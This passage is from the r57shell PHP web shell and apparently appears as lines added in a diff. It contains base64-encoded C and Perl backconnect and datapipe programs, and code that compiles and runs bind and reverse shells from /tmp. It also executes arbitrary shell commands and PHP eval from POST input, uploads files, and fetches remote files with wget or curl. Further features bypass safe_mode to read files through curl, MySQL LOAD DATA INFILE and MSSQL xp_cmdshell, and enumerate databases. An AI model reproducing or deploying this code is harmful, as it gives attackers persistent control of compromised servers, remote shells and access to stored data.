+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
